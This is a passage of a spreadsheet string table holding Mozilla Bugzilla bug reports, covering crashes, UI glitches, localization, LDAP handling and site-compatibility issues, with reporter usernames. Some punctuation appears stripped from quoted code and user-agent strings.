http://ftp.mozilla-japan.org/pub/mozilla-japan/thunderbird/development/0.9/thunderbird-0.9.ja-JPM.langpack-0.4.2.xpi
2. Some are edited by Composer and a window is closed.
Actual Results:
(D) is added to the Dont't Save button.
And (S) is added to the Save button.
Expected Results:
An access key is not added to the label of a button.</t>
  </si>
  <si>
    <t>CORE-509588</t>
  </si>
  <si>
    <t>IPDL skeleton code is wrong for constructors</t>
  </si>
  <si>
    <t>NPObjectProtocolParent* ActorImpl::NPObjectConstructor(NPError* rv)
  {
    return NS_ERROR_NOT_IMPLEMENTED
  }
Should return null and maybe add NS_NOTYETIMPLEMENTED(NPObjectConstructor) or something.</t>
  </si>
  <si>
    <t>CORE-525992</t>
  </si>
  <si>
    <t>[webgl] Null deref crash in gleRunVertexSubmitImmediate / mozilla::WebGLContext::DrawElements</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10_6_1 en-us) AppleWebKit/531.9 (KHTML like Gecko) Version/4.0.3 Safari/531.9
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.6 en-US rv:1.9.3a1pre) Gecko/20091101 Minefield/3.7a1pre
Null dereference crash in WebGL stuff affects 3.7 and not 3.5.  Related to malformed numbers passed to 
gl.vertexAttribPointer e.g. 
gl.vertexAttribPointer(02gl.FLOATfalse-655350)
Reproducible: Always
Steps to Reproduce:
Use recent Firefox 3.7 (this doesn't affect 3.5).
Set webgl.enabled_for_all_sites = true in about:config
Open attached html file
Actual Results:  
Crash.
Process:         firefox-bin [47105]
Path:            /Volumes/data_apps/obj-x86_64-apple-darwin10.0.0/dist/MinefieldDebug.app/Contents/MacOS/firefox-bin
Identifier:      org.mozilla.firefox
Version:         3.7a1pre (3.7a1pre)
Code Type:       X86-64 (Native)
Parent Process:  launchd [200]
Date/Time:       2009-11-02 13:15:50.940 -0800
OS Version:      Mac OS X 10.6.1 (10B504)
Report Version:  6
Interval Since Last Report:          2424 sec
Crashes Since Last Report:           4
Per-App Interval Since Last Report:  853 sec
Per-App Crashes Since Last Report:   4
Anonymous UUID:                      3D956540-F69B-4457-B4A4-761A72189954
Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000000000008
Crashed Thread:  0  Dispatch queue: com.apple.main-thread
Thread 0 Crashed:  Dispatch queue: com.apple.main-thread
0   GLEngine                      	0x000000011dcc4555 gleRunVertexSubmitImmediate + 4437
1   GLEngine                      	0x000000011dcc33db gleLLVMArrayFunc + 43
2   GLEngine                      	0x000000011dcc33ab gleSetVertexArrayFunc + 91
3   GLEngine                      	0x000000011dcb4639 gleDrawArraysOrElements_ExecCore + 711
4   GLEngine                      	0x000000011dcb4b42 gleDrawArraysOrElements_IMM_Exec + 1287
5   libgklayout.dylib             	0x00000001155b1b1a mozilla::WebGLContext::DrawElements(unsigned int unsigned int unsigned int unsigned int) + 312 (WebGLContextGL.cpp:1094)
6   libxpcom_core.dylib           	0x000000010040a541 NS_InvokeByIndex_P + 576 (xptcinvoke_x86_64_unix.cpp:208)
7   libxpconnect.dylib            	0x0000000113157147 XPCWrappedNative::CallMethod(XPCCallContext&amp; XPCWrappedNative::CallMode) + 6941 (xpcwrappednative.cpp:2727)
8   libxpconnect.dylib            	0x0000000113164166 XPC_WN_CallMethod(JSContext* JSObject* unsigned int long* long*) + 688 (xpcwrappednativejsops.cpp:1756)
9   libmozjs.dylib                	0x000000010011a61f js_Invoke + 2819 (jsinterp.cpp:1375)
10  libmozjs.dylib                	0x000000010010553f js_Interpret + 102296 (jsops.cpp:2309)
...</t>
  </si>
  <si>
    <t>mwsteele</t>
  </si>
  <si>
    <t>halb.halb</t>
  </si>
  <si>
    <t>FIREFOX-396702</t>
  </si>
  <si>
    <t>Not Displaying proper Font</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
Dear sir 
with above url i have use Hindi fonts and gave download font option too.
But after installing that font. when i restart the firefox still some of the text which is written in Hindi fonts not appear properly..
Kindly do needful as soon as possible.
TRK
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>dareboy007</t>
  </si>
  <si>
    <t>TOOLKIT-279227</t>
  </si>
  <si>
    <t>Move find bar strings out of browser #ifdef USE_FIND_BAR the find bar code that Thunderbird builds</t>
  </si>
  <si>
    <t>The Find Bar uses entities from .  This is
bad.  They should be moved into a new DTD in tookit/components/typeaheadfind so
that applications other than Firefox that want the Find Bar can use it without
toolkit source code hacks.</t>
  </si>
  <si>
    <t>CORE-102204</t>
  </si>
  <si>
    <t>Need to remove menu from its menubar when the menu goes away</t>
  </si>
  <si>
    <t>Emails from smfr:
One problem that I can see in the menu code is that keep a
ref to 'gDefaultRootMenu' around which just happens
to be the first menubar we create. However if that menubar
gets destroyed then we delete all its menu items (the
nsMenu code releases its MenuRefs) but we don't remove
those deleted MenuRefs from their parent menu bar In
addition it seems that the parent menu is not holding refs
to submenus (as you might expect).
So the garbage that I am seeing on 9 is related to the
        ::SetRootMenu(gDefaultRootMenu)
on a root menu whose submenus have been deleted but not
removed from their parent menubar. I verified this by
inserting a new dummy menu into this menu bar.
---
One thing I think we should definately fix is that the dtor for nsMenuX
should remove its menuRef from the parent menubar right now that doesn't
happen.
---
This is seen more often with non-jar builds (which smfr runs bless his heart)
since there appears to be a race condition with which menubar (hidden window or
nav window gets loaded first. It's all good if the hidden window loads first
but if the nav window does we get garbage as the menu is populated with bad
menuRefs.</t>
  </si>
  <si>
    <t>CORE-183866</t>
  </si>
  <si>
    <t>No need to attempt to load mathml.css if not necessary</t>
  </si>
  <si>
    <t>Noted that while a document is in been whacked by XSLT the css loader is
disabled and so it is not necessary to attempt to load mathml.css because it
will fail anyway (since bz's consolidation of the loading machinery). My debug
build shows a lot of warning messages about that now.</t>
  </si>
  <si>
    <t>THUNDERBIRD-333510</t>
  </si>
  <si>
    <t>Contacts Sidebar comes up empty</t>
  </si>
  <si>
    <t>Not sure when this regression first started.
If you have the contacts sidebar open in the compose window and you bring up a compose window the address book is selected but entries aren't displayed. Oddly enough quick search within the sidebar does show the results in the results pane.</t>
  </si>
  <si>
    <t>FIREFOX-317844</t>
  </si>
  <si>
    <t>API Review</t>
  </si>
  <si>
    <t>Final review of APIs (names etc) before turning this feature on.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-322699</t>
  </si>
  <si>
    <t>Just starting typing in history/bookmarks mode should default to quick search</t>
  </si>
  <si>
    <t>When I do Cmd-Y and just start typing I think Camino should default focus to quick search on the letters I type. Just like QuickSilver does.
Right now there is no default focus whatsoever I propse we make the quick search the first responder.  That way you can very quickly and easy find a page where you've been recently just using the keyboard.</t>
  </si>
  <si>
    <t>BUGZILLA-99697</t>
  </si>
  <si>
    <t>LDAP authentication does not check for emailregexp parameter.</t>
  </si>
  <si>
    <t>When using LDAP Bugzilla silently copies LDAP accounts into profiles table
without checking user emails againts email filter. On one server it is possible
to host multiple email domains and right now there is no way to restrict which
users can access Bugzilla.</t>
  </si>
  <si>
    <t>asolofnenko</t>
  </si>
  <si>
    <t>FIREFOX-518072</t>
  </si>
  <si>
    <t>Possible temporary dataloss during setup if passphrase is reset</t>
  </si>
  <si>
    <t>Given a first sync on a new device + forgotten passphrase Weave will need to delete server data to change the passphrase.  It will then upload the current client's data but of course not be able to download any other device's data.
This is mostly a ux problem users might not realize what's going on and be confused.
There is one additional case that is extra confusing: if the user chooses a directional sync down (replace client with cloud data) Weave will upload the current client's data to the cloud *before* wiping the client so you end up with the same data anyway.  Not that the correct solution is much better (wipe local before) in that case you would end up with no data whatsoever.</t>
  </si>
  <si>
    <t>TOOLKIT-345353</t>
  </si>
  <si>
    <t>Compatibility Wizard string changes</t>
  </si>
  <si>
    <t>Spinoff of bug 342606.
I also folded in your and Reed's comments to get: 
screen 1: 
   panel title: Checking Add-ons Compatibility
   progress text: Checking your add-ons
screen 2:
   panel title: Found Incompatible Add-ons
   text: The following add-ons are not compatible with this version of %S and
have been disabled:
   text: %S can check to see if compatible updates to these add-ons are
available.
screen 3:
   panel title: Checking for Compatibility Updates
   text: Checking for available updates to incompatible add-ons
   progress text: Checking for update to %S.
screen 4:
   panel title: Unable to Install Updates
   text: There are updates available but they can't be installed because
software installation for %S has been disabled. Please contact your
system administrator for assistance.
   - the don't check button should be a disabled Cancel button
screen 5:
   panel title: Found Compatibility Updates
   text: Select the updates you would like to install: 
screen 6:
   panel title: Found Compatibility Updates
   text: Select the updates you would like to install: 
   text: The selected updates can't be installed because software installation
is currently disabled. You can change this setting below. 
screen 7:
   panel title: Installing Compatibility Updates
   text: Downloading and installing updates to your add-ons
   progress text as current
screen 8:
   panel title: Compatibility Updates Installed
   text: %S has installed the updates to your add-ons.
screen 9:
   panel title: No Compatibility Updates Found
   text: %S was unable to find any updates for your incompatible add-ons. %S
will continue to check periodically and inform you when compatible updates for
these add-ons are found.
screen 10:
   panel title: Some Compatibility Updates Not Found
   text: %S was unable to find any updates for some of your incompatible
add-ons. %S will continue to check periodically and inform you when compatible
updates for these add-ons are found.
   - checkText is good as is
screen 11:
   panel title: No Compatibility Updates Found
   text: %S was unable to find any updates for your incompatible add-ons. %S
will continue to check periodically and inform you when compatible updates for
these add-ons are found.
   - checkText is good as is</t>
  </si>
  <si>
    <t>CALENDAR-229329</t>
  </si>
  <si>
    <t>Incorrect handling of VEVENT lacking DTEND or DURATION</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.5b) Gecko/20030730
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5) Gecko/20031007
RFC 2245 page 52 says:
   For cases where a VEVENT calendar component
   specifies a DTSTART property with a DATE-TIME data type but no
   DTEND property the event ends on the same calendar date and time
   of day specified by the DTSTART property.
Testing this behavior on Calendar Sep 26th I instead get an event that begins
at the specified time and runs till the end of the day.
Reproducible: Always
Steps to Reproduce:
1. Tools-&gt;Import from File...
2. Import the attached file
3. Don't bother opening event before importing
Actual Results:  
Get an event called Low Tide that begins at the right time but runs till the end
of the day.
Expected Results:  
Get a really short event.</t>
  </si>
  <si>
    <t>gray</t>
  </si>
  <si>
    <t>CORE-70181</t>
  </si>
  <si>
    <t>Keyboard shortcuts don't work under BeOS</t>
  </si>
  <si>
    <t>Except for Cmd+W and IIRC Cmd+Q no shortcut-key seems to work. Mainly Cut Copy
and Paste which I miss most.</t>
  </si>
  <si>
    <t>beos</t>
  </si>
  <si>
    <t>rosenauer</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-579956</t>
  </si>
  <si>
    <t>Phone system doesn't ring through to my voip extensions</t>
  </si>
  <si>
    <t>When I'm connected to VOIP (252soft) and Damon calls extension 252 from the office it doesn't ring on my local machine but goes straight to voicemail. My VOIP app (tried both SJPhone and Telephone) claims that I'm marked as Available.</t>
  </si>
  <si>
    <t>THUNDERBIRD-462147</t>
  </si>
  <si>
    <t>Allow migration from SeaMonkey 2.x profiles</t>
  </si>
  <si>
    <t>It looks like SeaMonkey will be releasing its version 2 sometime around when Thunderbird does (at a guess). As we already have a SM 1.x migrator we should have the same facility for 2.x.
I've got a WIP patch that will detect the SM 2.x profiles. I think it works on Mac (I wrote it quite a while ago) but the Linux &amp; Windows versions need tweaking.
If anyone can help that would be useful. The parts to look at are in nsSeamonkeyProfileMigrator.cpp where all the #ifdefs and #defines are.</t>
  </si>
  <si>
    <t>CORE-180015</t>
  </si>
  <si>
    <t>[FIX] {drag-select} Scrolling by selecting &amp; dragging jumps to top of page when marquee tag is encountered</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 es-ES m18) Gecko/20010131 Netscape6/6.01
Build Identifier: Mozilla 1.0.1 build 2002082606
When selecting text in any page that contains a  when the selection
reaches that marquee the browser immediately jumps to the top of the page.
Reproducible: Always
Steps to Reproduce:
1. Find a page which uses the Marquee tag.
2. Click on text in the page and drag downwards ot select.
3. Continue to drag below the bottom of the browser window so the page scrolls
downward as the selection grows.
Actual Results:  
When the selection reaches the marquee the page jumps right back up to the top.
Expected Results:  
Keep on scrolling (and selecting) downwards.
Reproducibility: doesn't happen *every* time but very nearly.</t>
  </si>
  <si>
    <t>dansoper</t>
  </si>
  <si>
    <t>CORE-363646</t>
  </si>
  <si>
    <t>message header tree table report incorrect number of table headers</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)
Build Identifier: version 3 alpha 1 (20061211)
There are 16 possible column headers. By default Thunderbird displays 8 of them.
1. Threads
2. Starred
3. Attachments
4. Subject
5. Read
6. Sender
7. Junk Status
8. Date
The problem is that the column header information is wrong. For the default settings:
- The column count is reported to be 3 when it should be 8
- Only the following headers are reported: Subject Sender and Date. Note these are just the headers containing text. 
This is a serious problem because the column count is used to determine the row and column for the cell as a specified index.  Assistive technologies cannot determine which cells belong to each column and row. In particular Orca cannot speak the cells in a mail header row correctly because it cannot get the actual cells in a given row.
Reproducible: Always
Steps to Reproduce:
1. Enable assistive technologies on the desktop.
2. Start Thunderbird 3
3. Start at-poke and view the treetable containing the message headers. You will see that the column count is incorrect and the header list only contains headers with text.
Actual Results:  
See Details above.
Expected Results:  
All of the message table headers should be returned by the AT-SPI</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-488861</t>
  </si>
  <si>
    <t>Add a CFBundleDisplayName to crash_report_sender.app</t>
  </si>
  <si>
    <t>crash_report_sender currently reports its name in the Dock the menubar and the Hide/About menus as crash_report_sender.  That's ugly :P
We should supply our own CFBundleDisplayName and friends (i.e. implement bug 382762 here).  My plan right now is to try to do this via a shell script build phase so that our changes won't get stomped by Breakpad updates.</t>
  </si>
  <si>
    <t>CORE-329749</t>
  </si>
  <si>
    <t>Did JS_SealObject mean to call JS_UNLOCK_OBJ instead of JS_UNLOCK_SCOPE ?</t>
  </si>
  <si>
    <t>Coverity is complaining about dereferencing scope before and after null checks of it. I suspect it's because the wrong creature is being unlocked. But what do I know? :)</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-515214</t>
  </si>
  <si>
    <t>can't request/set blocking-fennec or blocking1.9.3 on enter_bug.cgi</t>
  </si>
  <si>
    <t>https://bugzilla.mozilla.org/enter_bug.cgi?product=Fennec
The blocking-fennec flag can't be requested (?) from that form. The only drop down entry is a blank space. Works fine from show_bug.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-453044</t>
  </si>
  <si>
    <t>[404] link to http://www.mozilla.org/catalog/end-user/customizing/briefprefs.html</t>
  </si>
  <si>
    <t>404: File Not Found
/catalog/end-user/customizing/briefprefs.html
We are sorry the file you requested could not be found.
Referring page:
http://developer.mozilla.org/en/Mozilla_Networking_Preferences</t>
  </si>
  <si>
    <t>aelle21</t>
  </si>
  <si>
    <t>NSS-382775</t>
  </si>
  <si>
    <t>There should be a test for certutil -D (certificate deletion)</t>
  </si>
  <si>
    <t>Currently there is a test that says it checks certutil -D in fips.sh but in fact it calls certutil -F . The name of that test should be fixed and there should be a new test that really calls certutil -D .</t>
  </si>
  <si>
    <t>CORE-206165</t>
  </si>
  <si>
    <t>Unused variable `PRBool aCanCacheFrameOffset' in nsCaret::GetCaretRectAndInvert</t>
  </si>
  <si>
    <t>1. layout/base/src/nsCaret.cpp:1061 (See build log excerpt)
   Unused variable `PRBool aCanCacheFrameOffset'
   1061 PRBool    aCanCacheFrameOffset = PR_FALSE</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-319470</t>
  </si>
  <si>
    <t>Trademark review for Russian (ru) Thunderbird 1.5</t>
  </si>
  <si>
    <t>Patches for start.dtd and region.properties following these guidelines:
http://wiki.mozilla.org/L10n:Thunderbird_Trademark_Review
I would also ask the following links to be redirected to translated content:
In start.dtd:
URL:
startpage.helpURL=http://www.mozilla.org/support/thunderbird/
Redirect:
http://www.mozilla.ru/products/thunderbird/
In region.properties:
URL:
releaseNotesURL=http://www.mozilla-world.org/ru/products/thunderbird/releases/%S.html
Redirect:
http://www.mozilla.ru/products/thunderbird/release-notes.html
URL:
app.update.url.details=http://www.mozilla-world.org/ru/products/thunderbird/releases/
Redirect:
http://www.mozilla.ru/products/thunderbird/release-notes.html
URL:
mailnews.hints_and_tips.url=http://www.mozilla.org/support/thunderbird/
Redirect:
http://www.mozilla.ru/products/thunderbird/</t>
  </si>
  <si>
    <t>unghost</t>
  </si>
  <si>
    <t>BUGZILLA-302449</t>
  </si>
  <si>
    <t>Update Download Page for 2.20rc2</t>
  </si>
  <si>
    <t>So we pretty much know how to do this. :-) We'll have... four branches now I
think. So Release Candidate will suddenly be different from Development Branch.
We'll have to make sure all the links are correct everywhere on the site after
that.</t>
  </si>
  <si>
    <t>CORE-424161</t>
  </si>
  <si>
    <t>Tree invalidation screwed up badly getting 6 failures on Mochitest for bug 368835.</t>
  </si>
  <si>
    <t>The failures are:
Passed: 10
Failed: 6
Todo: 0
not ok - Wrong 'startrow' of 'treeInvalidated' event on InvalidateRow(). got 0 expected null
not ok - Wrong 'endrow' of 'treeInvalidated' event on InvalidateRow(). got 0 expected null
not ok - Wrong 'startrow' of 'treeInvalidated' event on InvalidateColumn(). got 3 expected 1
not ok - Wrong 'endrow' of 'treeInvalidated' event on InvalidateColumn(). got 3 expected 1
not ok - Wrong 'startcolumn' of 'treeInvalidated' event on InvalidateColumn(). got 0 expected null
not ok - Wrong 'endcolumn' of 'treeInvalidated' event on InvalidateColumn(). got 0 expected null
In addition Mike Pedersen from the Orca team reports that after fix for bug 421922 landed and tree table accessibles are restored the info Orca is getting is complete nonsense.</t>
  </si>
  <si>
    <t>mzehe</t>
  </si>
  <si>
    <t>CORE-443764</t>
  </si>
  <si>
    <t>nsHTMLSelectListAccessible::GetState -- |if| condition is always true</t>
  </si>
  <si>
    <t>The reporter of bug 440771 points out that this condition is always true:
accessible/src/html/nsHTMLSelectAccessible.cpp:338
if (*aState | nsIAccessibleStates::STATE_FOCUSED) {
I'm guessing it was intended to be &amp; or !(...&amp;...) but I don't know which so I'm not attaching a patch.
This |if| statement was added in bug 391490.</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-484731</t>
  </si>
  <si>
    <t>On Safari 4 / Mac if you double click strange things happen</t>
  </si>
  <si>
    <t>If you double click on an item in the editor instead of just highlighting it the file is saved and the quick open dialog pops up!</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-378696</t>
  </si>
  <si>
    <t>Remove dead search code</t>
  </si>
  <si>
    <t>When working on Bug 121774 I found a lot of dead search code in the DOMi.  This should be canned and will make Bug 121774's patch much easier to review.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-428178</t>
  </si>
  <si>
    <t>it / Italian</t>
  </si>
  <si>
    <t>[it-IT] Getting started page for Firefox 3 potential link changes</t>
  </si>
  <si>
    <t>This bug deals with the potential productization changes for the getting started page in bug #428145
Read bug #428145 for more details.
If you think your locale needs to have some link changes in the above bug propose them here for approval. If you don't just close the bug.</t>
  </si>
  <si>
    <t>l10n-it</t>
  </si>
  <si>
    <t>MOZILLA.ORG-411749</t>
  </si>
  <si>
    <t>Change SSH key for marco@gnome.org</t>
  </si>
  <si>
    <t>i vouch.  his fu is strong.</t>
  </si>
  <si>
    <t>SEAMONKEY-150077</t>
  </si>
  <si>
    <t>js/src/fdlibm needs to show up for js module dirs</t>
  </si>
  <si>
    <t>js/Makefile.in says that src/fdlibm needs to be built before src
we lose this info by not starting from top-level js directory.
We can fix this by either just mapping js to js or by
adding this directory.  I think we should add src/fdlibm
that way we won't pull down non-js dirs like jsd for js.
patch coming up</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-92613</t>
  </si>
  <si>
    <t>History: Global</t>
  </si>
  <si>
    <t>Last page visited shows chrome://global/locale/about.html</t>
  </si>
  <si>
    <t>Mozilla 0.9 showed chrome://gloabal/locale/about.html as the URL for the
about-menu item.
If you are using last page visited it saves and displays this URL the next time.
Isn't displaying chrome URL's bad?
Should we have some kind of chrome URL blocking code for last visited or the URL
field?</t>
  </si>
  <si>
    <t>benc</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-304209</t>
  </si>
  <si>
    <t>[Firefox-Hilfe 1.5] mouse_shortcuts.xhtml</t>
  </si>
  <si>
    <t>Tracker fuer die mouse_shortcuts.xhtml Ubersetzung</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-412483</t>
  </si>
  <si>
    <t>move branch builders to branch bonsai poller</t>
  </si>
  <si>
    <t>currently branch builds are being triggered by trunk checkins. Need to move these to the correct branch bonsai poller</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-260830</t>
  </si>
  <si>
    <t>chelseaeye.com - Works fine in IE and Netscape However in Moz. it does not display the white background.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20040913 Firefox/0.10
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20040913 Firefox/0.10
Works fine in IE and Netscape in Moz. it does not display the white background.
Why does it not diplay the background? It displays the background black. Major bug.
Reproducible: Always
Steps to Reproduce:
1. By going to http://www.chelseaeye.com/ectropion.htm or any other page on the
site domain.
2.
3.
Actual Results:  
black background shows up instead of white.
Expected Results:  
display a white background take a look in IE or Netscape.</t>
  </si>
  <si>
    <t>THUNDERBIRD-368914</t>
  </si>
  <si>
    <t>remove unnecessary strings in contentAreaCommands.dtd</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Build Identifier: 
There are some strings in contentAreaCommands.dtd that can be removed now that bug 333607 has been fixed. Patch coming in a minute...
Reproducible: Always</t>
  </si>
  <si>
    <t>bisi</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-68366</t>
  </si>
  <si>
    <t>asserts prevent automated regression tests from being run</t>
  </si>
  <si>
    <t>1. nsWebBrowserChrome needs to implement nsIPrompt.
2. nsDocShellTreeOwner has an unnecessary assertion.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-197084</t>
  </si>
  <si>
    <t>Embedding: APIs</t>
  </si>
  <si>
    <t>[AxPlugin] Install activex.js default prefs</t>
  </si>
  <si>
    <t>COM connect / ActiveX work needs a default set of prefs defining the blacklist /
whitelist mode and hosting flags. These should go into an activex.js file which
is installed into mozilla/defaults/pref
By default it should probably operate in blacklist mode with a resonably
security set of flags and otherwise be blank anticipating that embedders will
probably wish to write their own version anyway.
Inline documentation would also help embedders customize this file.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-63413</t>
  </si>
  <si>
    <t>remove workaround to 48515</t>
  </si>
  <si>
    <t>nsSecureBrowserUIImpl.cpp has a workaround for bug 48515 which should be removed 
once bug 48515 is fixed.</t>
  </si>
  <si>
    <t>JSS-162904</t>
  </si>
  <si>
    <t>Missing invalidityDate in RevRequest in CMMF package</t>
  </si>
  <si>
    <t>The invalidityDate field is missing from RevRequest.
I think this is because the spec changed. CMMF doesn't even exist anymore it's
now part of CMC.
It is documented in RFC 2797.</t>
  </si>
  <si>
    <t>CORE-278983</t>
  </si>
  <si>
    <t>[FIX] Print Preview crashes: table+thead+page-break-before:always</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 hu-HU rv:1.7.5) Gecko/20041108 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 hu-HU rv:1.7.5) Gecko/20041108 Firefox/1.0
If I want to see the Print Preview of a page which 
- contains not only a tbody but a thead or a tfoot tag as well and
- tbody's css setting is the following: page-break-before:always
page-break-after:always page-break-inside:avoid
then the program does not respond any more. If there is only a tbody without
thead and tfoot then the problem does not appear. 
Reproducible: Always
Steps to Reproduce:
To reproduce the bug do the following steps:
1. open the attached file #1
2. choose the File =&gt; Print Preview menupoint.
The problem is rather important because if I have more Firefox instances running
in several separate windows then all of them will hang up.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-140109</t>
  </si>
  <si>
    <t>yale.edu - RC1 seems to have problems that 0.9.9 didn't have</t>
  </si>
  <si>
    <t xml:space="preserve">From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.0rc1)
Gecko/20020417
BuildID:    20020417
After logging in to classes.yale.edu (need a valid Yale student ID number) the
top frame displays an error message. This page has worked in all previous
Mozilla builds.
Reproducible: Always
Steps to Reproduce:
1. Log in with valid Yale NetID (have provided Javascript source in description)
2.
3.
Actual Results:  Got an error message:
---------------------------------------------
JRun Servlet Error
---------------------------------------------
StNav:
java.lang.NumberFormatException: 1.0rc1
---------------------------------------------
Expected Results:  To display it as it does in IE and Moz builds prior to RC 1.
The Javascript looks like this:
&lt;!--
var relpg = 'JAPN 119-2b'
function loadgen(go)
{
garr = go.split('|')
eval(parent.gen.location.replace('https://classes.yale.edu/servlet/ + garr[0]
+ '))
document.indbox.src ='https://classes.yale.edu/jsp/' + garr[1]
}
function loadmat(go)
{
garr = go.split('|')
parent.gen.location.replace('https://classes.yale.edu/servlet/StSort?dir=materials
document.indbox.src ='https://classes.yale.edu/jsp/' + garr[1]
}
function loadupl(go)
{
garr = go.split('|')
eval(parent.gen.location.replace('https://classes.yale.edu/servlet/StUploadPage'))
document.indbox.src ='https://classes.yale.edu/jsp/' + garr[1]
}
function gotop()
{
top.gotop(document.forms[0].chopage.options[document.forms[0].chopage.selectedIndex].value)
}
function smallframe()
{
var nextyear = new Date(2002 9 1)
document.cookie = framesize=small expires= + nextyear.toGMTString()
top.gotop(relpg + '
}
function bigframe()
{
var nextyear = new Date(2002 9 1)
document.cookie = framesize=big expires= + nextyear.toGMTString()
top.gotop(relpg + '
}
//--&gt;
&lt;!--
.boldFont {
font-family: verdana arial helvetica sans-serif
font-weight: bold
font-size: small
}
//--&gt;
&lt;LINK REL='StyleSheet' HREF='https://classes.yale.edu/jsp/instruct.css'
TYPE='text/css'&gt;
&lt;img
src='https://classes.yale.edu/jsp/blackspace.gif' suppress='true' width='1'&gt;
&lt;img src='https://classes.yale.edu/jsp/blackspace.gif'
suppress='true' height='1'&gt;
&lt;img
src='https://classes.yale.edu/jsp/blackspace.gif' suppress='true' width='1'&gt;
&lt;img src='https://classes.yale.edu/jsp/blackspace.gif'
suppress='true' height='1'&gt;
&lt;img
src='https://classes.yale.edu/jsp/blackspace.gif' suppress='true' width='1'&gt;
&lt;img src='https://classes.yale.edu/jsp/blackspace.gif'
suppress='true' height='1'&gt;
&lt;img
src='https://classes.yale.edu/jsp/blackspace.gif' suppress='true' width='1'&gt;
&lt;img src='https://classes.yale.edu/jsp/blackspace.gif'
suppress='true' height='1'&gt;
&lt;img
src='https://classes.yale.edu/jsp/blackspace.gif' suppress='true' width='1'&gt;
&lt;img src='https://classes.yale.edu/jsp/blackspace.gif'
suppress='true' height='1'&gt;
&lt;img
src='https://classes.yale.edu/jsp/blackspace.gif' suppress='true' width='1'&gt;
&lt;img src='https://classes.yale.edu/jsp/blackspace.gif'
suppress='true' height='1'&gt;
&lt;img
src='https://classes.yale.edu/jsp/blackspace.gif' suppress='true' width='1'&gt;
&lt;a href='javascript:smallframe() //'
onMouseOver=status='Reduce size of top frame' return true
onMouseOut=status=''&gt;&lt;img src='https://classes.yale.edu/jsp/shrinkbox.gif'
height='10' width='14' border='0' alt='Shrink the top frame'&gt;
&lt;font face='verdana
arial helvetica sans-serif' size=-1&gt;&lt;a
href=javascript:loadgen('StViewHomePage?japn119-2b|stgreen.gif')
onMouseOver=status='Class web pages - last updated Jan 9 2002 6:20 PM' return
true onMouseOut=status=''&gt;Web
Page
&lt;font face='verdana
arial helvetica sans-serif' size=-1&gt;&lt;a
href=javascript:loadgen('StViewSyllabus?japn119-2b|stred.gif')
onMouseOver=status='No syllabus on classes.yale.edu for this course' return
true onMouseOut=status=''&gt;&lt;font
color='#FFFFFF'&gt;Syllabus
&lt;font face='verdana
arial helvetica sans-serif' size=-1&gt;&lt;a
href=javascript:loadmat('StSort|storange.gif') onMouseOver=status='Class
Materials - last updated Jan 9 2002 6:20 PM' return true
onMouseOut=status=''&gt;Materials
&lt;font face='verdana
arial helvetica sans-serif' size=-1&gt;&lt;a
href=javascript:loadupl('StUploadPage|stblue.gif') onMouseOver=status='Upload
a file' return true onMouseOut=status=''&gt;&lt;font
color='#FFFFFF'&gt;Upload
&lt;font face='verdana
arial helvetica sans-serif' size=-1&gt;&lt;a
href=javascript:loadgen('StChat?japn119-2b|stdgreen.gif')
onMouseOver=status='Online chat - last posting Sep 23 1999 5:09 AM' return
true onMouseOut=status=''&gt;Chat
&lt;font face='verdana
arial helvetica sans-serif' size=-1&gt;&lt;a
href=javascript:loadgen('StNewsG?japn119-2b|stnavy.gif')
onMouseOver=status='Discussion group - no postings on classes.yale.edu for this
course' return true onMouseOut=status=''&gt;&lt;font
color='#FFFFFF'&gt;Newsgroup
&lt;img src='https://classes.yale.edu/jsp/blackspace.gif'
height='1'&gt;
&lt;img src='https://classes.yale.edu/jsp/blackspace.gif'
height='1'&gt;
&lt;img src='https://classes.yale.edu/jsp/blackspace.gif'
height='1'&gt;
&lt;img src='https://classes.yale.edu/jsp/blackspace.gif'
height='1'&gt;
&lt;img src='https://classes.yale.edu/jsp/blackspace.gif'
height='1'&gt;
